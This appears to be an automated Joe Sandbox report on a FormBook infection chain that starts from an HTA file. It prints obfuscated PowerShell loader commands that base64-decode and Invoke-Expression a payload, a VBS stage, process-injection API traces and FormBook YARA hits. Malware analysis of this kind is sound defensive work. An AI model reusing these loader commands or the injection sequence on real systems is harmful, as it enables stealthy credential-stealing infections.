                                                                                                      2024-12-04 12:08:27 UTC1378INData Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
                                                                                                      Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
                                                                                                      2024-12-04 12:08:27 UTC1378INData Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
                                                                                                      Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
                                                                                                      2024-12-04 12:08:27 UTC1378INData Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
                                                                                                      Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
                                                                                                      2024-12-04 12:08:27 UTC1378INData Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                                                                      Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#



                                                                                                      Target ID:0
                                                                                                      Start time:07:08:13
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:mshta.exe "C:\Users\user\Desktop\bestimylover.hta"
                                                                                                      Imagebase:0x9f0000
                                                                                                      File size:13'312 bytes
                                                                                                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:1
                                                                                                      Start time:07:08:14
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\system32\cmd.exe" "/c pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'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'+[cHAr]34+'))')))"
                                                                                                      Imagebase:0xa40000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:2
                                                                                                      Start time:07:08:14
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:3
                                                                                                      Start time:07:08:14
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'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'+[cHAr]34+'))')))"
                                                                                                      Imagebase:0xa80000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:4
                                                                                                      Start time:07:08:16
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline"
                                                                                                      Imagebase:0xfc0000
                                                                                                      File size:2'141'552 bytes
                                                                                                      MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:5
                                                                                                      Start time:07:08:17
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES66CD.tmp" "c:\Users\user\AppData\Local\Temp\hfoj0pnm\CSC102A1040D3F84A7CBD6AF35F51E7FDEF.TMP"
                                                                                                      Imagebase:0x140000
                                                                                                      File size:46'832 bytes
                                                                                                      MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:7
                                                                                                      Start time:07:08:23
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS"
                                                                                                      Imagebase:0x890000
                                                                                                      File size:147'456 bytes
                                                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:8
                                                                                                      Start time:07:08:23
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = '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';$monophthongs = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($familial));Invoke-Expression $monophthongs
                                                                                                      Imagebase:0xa80000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:9
                                                                                                      Start time:07:08:23
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:11
                                                                                                      Start time:07:08:45
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                                                      Imagebase:0x330000
                                                                                                      File size:56'368 bytes
                                                                                                      MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:12
                                                                                                      Start time:07:08:45
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                                                      Imagebase:0xcd0000
                                                                                                      File size:56'368 bytes
                                                                                                      MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2122879253.00000000015E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2138725831.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      Has exited:true

                                                                                                      Target ID:15
                                                                                                      Start time:07:09:13
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe"
                                                                                                      Imagebase:0x770000
                                                                                                      File size:140'800 bytes
                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2658015654.00000000035E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      Has exited:false

                                                                                                      Target ID:16
                                                                                                      Start time:07:09:14
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\msinfo32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\SysWOW64\msinfo32.exe"
                                                                                                      Imagebase:0x8f0000
                                                                                                      File size:338'432 bytes
                                                                                                      MD5 hash:5C49B7B55D4AF40DB1047E08484D6656
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2658176307.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2658252130.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      Has exited:false

                                                                                                      Target ID:17
                                                                                                      Start time:07:09:29
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe"
                                                                                                      Imagebase:0x770000
                                                                                                      File size:140'800 bytes
                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      Target ID:19
                                                                                                      Start time:07:09:41
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                      Imagebase:0x7ff6d20e0000
                                                                                                      File size:676'768 bytes
                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.1439005692.0000000006DB0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_6db0000_mshta.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                        • Instruction ID: 1c8f2805549fd45628e10151a6b7e152156da09fe91a6f835cc12ecff2eb4f2b
                                                                                                        • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                        • Instruction Fuzzy Hash:

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:2.9%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:48
                                                                                                        Total number of Limit Nodes:6

                                                                                                        Control-flow Graph

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1544069775.00000000032F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_32f0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 41aaa66e43e77ee48205bc47c3cc4f9583525770a2e99b6e78a14bba4ed006b0
                                                                                                        • Instruction ID: ac4e2a9fbe6ef0b1e5c40554c6e55a06a3002462eef4c4ef9c413f2e21ee3773
                                                                                                        • Opcode Fuzzy Hash: 41aaa66e43e77ee48205bc47c3cc4f9583525770a2e99b6e78a14bba4ed006b0
                                                                                                        • Instruction Fuzzy Hash: 69E11875A10219EFDB05CF98D884A9EFBB2FF88350F248169E904AB351C771ED91CB90

                                                                                                        Control-flow Graph

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1548146646.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7900000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 84i$84i$84i$84i$84i$84i
                                                                                                        • API String ID: 0-3608691829
                                                                                                        • Opcode ID: c595244ad07d6bf66147122d551266bb8b93acd964c5227510b91c2e3fcb997a
                                                                                                        • Instruction ID: c2e7dcae83f3bce533ea2f4f838a393f35482447a132ba7a3bb28623c343237f
                                                                                                        • Opcode Fuzzy Hash: c595244ad07d6bf66147122d551266bb8b93acd964c5227510b91c2e3fcb997a
                                                                                                        • Instruction Fuzzy Hash: 5AF112B4B10345AFDF149F68C400B6EBBA6EBCA714F248469EA059B390DB71DC51CBE1

                                                                                                        Control-flow Graph

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1548146646.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7900000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 84i$84i$84i
                                                                                                        • API String ID: 0-1595485978
                                                                                                        • Opcode ID: f301c13ed1c0176754dcd0abe933d97312b3926d1b8d3441c7d425145da16b65
                                                                                                        • Instruction ID: 93aff703fb3dcdeec8720d77a440190339be428495d691758501cc4ed706d9f0
                                                                                                        • Opcode Fuzzy Hash: f301c13ed1c0176754dcd0abe933d97312b3926d1b8d3441c7d425145da16b65
                                                                                                        • Instruction Fuzzy Hash: 4291E2B4A203459FCF18CF58C440B69B7B6EB8A714F24C469EA15AB3A0D771DC91CBD1

                                                                                                        Control-flow Graph

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1548146646.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7900000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 84i$84i
                                                                                                        • API String ID: 0-1526663543

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • URLDownloadToFileW.URLMON(?,00000000,00000008,?,?), ref: 032F7E99
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1544069775.00000000032F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_32f0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DownloadFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 1407266417-0

                                                                                                        Control-flow Graph

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1548146646.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7900000_powershell.jbxd

                                                                                                        Control-flow Graph

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1548146646.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7900000_powershell.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1543440741.00000000031DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031DD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_31dd000_powershell.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1544069775.00000000032F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_32f0000_powershell.jbxd

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:4.9%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:37
                                                                                                        Total number of Limit Nodes:3
                                                                                                        execution_graph 8968 35b7d67 8969 35b7d51 8968->8969 8971 35b7e0d 8969->8971 8973 35b8738 8969->8973 8974 35b8742 8973->8974 8975 35b7e65 8973->8975 8977 35b87b0 8974->8977 8978 35b882d 8977->8978 8986 35b8eb4 8978->8986 9001 35b72f0 8978->9001 8980 35b9095 CreateProcessW 8983 35b9109 8980->8983 8981 35b88b8 8982 35b72fc Wow64SetThreadContext 8981->8982 8981->8986 8984 35b8923 8982->8984 8985 35b8a36 VirtualAllocEx 8984->8985 8984->8986 8999 35b8da8 8984->8999 8987 35b8a83 8985->8987 8986->8980 8986->8999 8987->8986 8988 35b8ad1 VirtualAllocEx 8987->8988 8990 35b8b25 8987->8990 8988->8990 8989 35b7314 WriteProcessMemory 8991 35b8b6f 8989->8991 8990->8986 8990->8989 8990->8999 8991->8986 8992 35b8cb9 8991->8992 8991->8999 9000 35b7314 WriteProcessMemory 8991->9000 8992->8986 8993 35b7314 WriteProcessMemory 8992->8993 8994 35b8ce2 8993->8994 8994->8986 8995 35b7320 Wow64SetThreadContext 8994->8995 8994->8999 8996 35b8d57 8995->8996 8996->8986 8997 35b8d5f 8996->8997 8998 35b8d68 ResumeThread 8997->8998 8997->8999 8998->8999 8999->8975 9000->8991 9002 35b8fb0 CreateProcessW 9001->9002 9004 35b9109 9002->9004 9005 35b7e76 9006 35b7e42 9005->9006 9007 35b7e96 9006->9007 9009 35b8738 8 API calls 9006->9009 9008 35b7e65 9009->9008

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 035B8A6A
                                                                                                        • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 035B8B0C
                                                                                                          • Part of subcall function 035B7314: WriteProcessMemory.KERNELBASE(?,00000000,00000000,18E62514,00000000,?,?,?,00000000,00000000,?,035B8B6F,?,00000000,?), ref: 035B96FC
                                                                                                        • ResumeThread.KERNELBASE(?), ref: 035B8D8F
                                                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 035B90F4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1751350367.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_35b0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 4270437565-0
                                                                                                        • Opcode ID: 6a34eae097e97aaf3585b90e697dbd19ecf2722fb2d7c50aa83bf7f0ba2963a8
                                                                                                        • Instruction ID: 4bc3b585fd5d08d47007b7226b7b542eac6cc3c7f2e1b3a964c8add313d39765
                                                                                                        • Opcode Fuzzy Hash: 6a34eae097e97aaf3585b90e697dbd19ecf2722fb2d7c50aa83bf7f0ba2963a8
                                                                                                        • Instruction Fuzzy Hash: 1342AF70A0025ACFEB24DF65E850BDEB7B6BF84300F1485A9D909AB3A0DB359D85CF51

                                                                                                        Control-flow Graph

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1786825555.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_7d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: _
                                                                                                        • API String ID: 0-701932520
                                                                                                        • Opcode ID: 2ef2cfbda21a4d7c2c70975b034d790fc92afbc7e22eb40c17e0eccb8b580f34
                                                                                                        • Instruction ID: 20f2587a988516cf7dc849bd23380720674779792ea1767b3df3cff1d8bbeebb
                                                                                                        • Opcode Fuzzy Hash: 2ef2cfbda21a4d7c2c70975b034d790fc92afbc7e22eb40c17e0eccb8b580f34
                                                                                                        • Instruction Fuzzy Hash: A4F121B1B0530ADFCB259B68C8087AEFBA2BF85311F14D06AD9558B2D1DB31E845C7E1

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 035B90F4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1751350367.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_35b0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
